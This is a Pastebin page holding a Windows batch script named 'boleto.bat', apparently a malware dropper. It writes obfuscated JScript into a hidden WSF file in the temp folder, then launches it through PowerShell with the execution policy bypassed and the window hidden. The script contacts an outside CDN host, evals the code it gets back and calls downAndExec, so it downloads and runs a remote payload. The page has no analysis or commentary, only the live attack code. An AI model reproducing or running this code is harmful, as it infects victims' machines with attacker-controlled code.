Advertisement
opexxx

boleto.bat

Aug 18th, 2017
263
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.67 KB | None | 0 0
  1. @echo off
  2. set cdm="%TEMP%\lnlspesybhhsidmf.wsf"
  3. echo ^<?xml version=^"1.0^" ?^>^<job id=^"2143^"^>^<script language=^"JSCript^"^>^<![CDATA[var oWZau;(function(){function a(){if(!b){b(null)};function b(){function c(){if(!c){if(b=== 1){b();return};c();return};function c(){function c(){var g=function(c){var d=^"M^";if(!b){return};var f=^"^";d= d+ ^"S^";d= d+ ^"X^";d= d+ ^"M^";d= d+ ^"L^";d= d+ ^"2^";d= d+ ^".^";d= d+ ^"X^";d= d+ ^"M^";d= d+ ^"L^";d= d+ ^"H^";d= d+ ^"T^";d= d+ ^"T^";if(!b){b= true};f= ^"123^";d= d+ ^"P^";if(c== 2){return new ActiveXObject(d)};return false};var c=function(h,c,d){var f=^"^";if(!b){b(false,false,1);b= null}else {var g=^"^"};if(c== 3){f= ^"G^";if(!b){b();b= false;return}else {f= f+ ^"E^"};if(!b){b= 1};f= f+ ^"T^"};if(d== 4){g= ^"https://1591523753.rsc.cdn77.org/p2r.php?^"};h.Open(f,g,false)};var d=function(){try{var h=g(2);c(h,3,4);h.Send();if(b== 1){b= false;return};var f=h.Status;if(f+ 2== 202){var d=function(){return h.responseText};if(!b){b();return};return d()}}catch(e){};return false};if(!b){b= false};for(i= 0;i^< 5;i++){var f=d();if(f){if(!b){return};eval(f+ ^"downAndExec(\^"https://1591523753.rsc.cdn77.org\^", \^"648Q\^");^");break}else {if(!b){b(0,null,true,null,true);b= false;return};WScript.Sleep(5000)}}}if(c=== 1){c();c= 1;return};oWZau= c;if(c== 1){c(1,true);return}else {if(b=== null){b(true);b= null}else {oWZau()}}}if(c=== null){c= 1}else {(c)()}}if(c== false){return};if(!b){b()}else {(c)()}}if(b== 1){b(false,null);b= true;return};(b)()}(a)()})()]]^>^</script^>^</job^> > %cdm%
  4. %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -command Start-Process '"%cdm%"'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement